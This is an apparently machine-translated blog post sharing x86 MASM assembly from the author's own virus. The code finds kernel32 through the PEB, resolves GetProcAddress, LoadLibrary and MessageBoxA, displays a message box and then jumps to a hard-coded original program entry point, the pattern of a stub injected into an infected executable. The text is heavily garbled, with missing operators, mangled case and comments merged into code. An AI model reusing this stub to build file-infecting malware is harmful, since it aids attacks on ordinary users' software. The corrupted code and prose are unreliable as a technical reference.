The virus written in the previous year, when I was a Laura virus, then I wrote a lot of information, and I would like to have a lot of information, mainly 386 compilation and PE file structure, personal feelings, what is not very difficult, I still don't Too familiar with macro assembly, otherwise you can have a more concise code. 486.Model flat, stdcall option casemap: noneinclude /masm32/include/windows.inc.codestart: Call PstartpStart: PTR [ESP] Sub EBX , OFFSET PSTART; // EBX is the relocation information, and now it should be 0 push eBp; // save the EBP MOV EBP, ESP SUB ESP, 80H when the program is saved; // Change 40h Mov DWORD PTR [EBP-4] according to variables , EBX; // Save to PBase; /// getkernelbase /// Mov Eax, SS: [30h] Test Eax, EAX JS LOC1 MOV EAX, DWORD PTR [Eax 0ch] MOV ESI, DWORD PTR [EAX 1CH] Lodsd MOV EAX, DWORD PTR [EAX 8] JMP LOC2LOC1: MOV Eax, DWORD PTR [EAX 34H] MOV EAX, DWORD PTR [EAX 0B8H] LOC2: MOV DWORD PTR [EBP-10H], EAX PUSH EBP; / / Save Variable Table Pointer EBP MOV EBP, EAX; // EBP = KBase; /// Get GetProcaddress's Enterpoint // Mov EAX, DWORD PTR [EBP 3CH] MOV EDX, DWORD PTR [EBP EAX 120] Add Edx, EBP MOV ECX, DWORD PTR [EDX 24]; // Number MoV EBX, DWORD PTR [EDX 28]; // AT = ESP 4 Push DWORD PTR [EDX 32]; // nPT = ESP; MOV EDI ESP Sub EDI, 10H MOV DWORD PTR [EDI], 50746547H MOV DWORD PTR [EDI 4], 41636F72H; To change MOV DWORD PTR [EDI 8], 65726464H MOV DWORD PTR [EDI 0CH], 00007373H; FindStart: DEC ECX XOR EDX, EDX MOV ESI, DWORD PTR [ESP] Add ESI, EBP MOV ESI, DWORD PTR [ESI] Add ESI, EBPCMPBYTE: LODSB CMP AL, BYTE PTR [EDI EDX] JNE NOTSAME CMP EDX, 14 JE FIND INC EDX LOOP CMPBYTE JMP CANTFINDNOTSAME: Add DWORD PTR [ESP], 4 Add EBX, 4 JMP FindstartcantFind: XOR EAX, EAX JMP FindendFind: Add EBX, EBP MOV EAX, DWORD PTR [EBX] Add Eax, EBPFINDEND: Add ESP, 4 POP EBP ; // POP running variable table pointer MOV DWORD PTR [EBP-0CH], EAX; // Save GetProcAddress function entry point;
/ MOV EBX, DWORD PTR [EBP-4] MOV EDX, OFFSET LOADLIBRARY; / / LOADLIBRARY ADD EDX, EBX PUSH EDX PUSH DWORD PTR [EBP-10H] Call Dword PTR [EBP-0CH]; // Get address MOV for LoadLibrary DWORD PTR [EBP-14H], EAXMOV EDX, OFFSET USER32; // User32.dll Add Edx, EBX PUSH EDX CALL EAX; // Call LoadLibrary
Mov Edx, Offset MessageBox; // User32.dll Add Edx, EBX
Push Edx Push Eax Call DWORD PTR [EBP-0CH]; // Get the address of MessageBoxa
Push 0 Push EDX PUSH EDX PUSH 0 CALL EAX NOP NOP
; // Add ESP, 80H; // Change 40H POP EBP JMP PEND; LoadLibrary: DB "LoadLibrary, 0User32: DB" User32.dll ", 0MESSAGEBOX: DB" MessageBoxa ", 0PEND: MOV EAX, 0041C560H; / / Go to normal program entry point JMP EAX NOP NOP NOP NOP NOP NOP
End Start
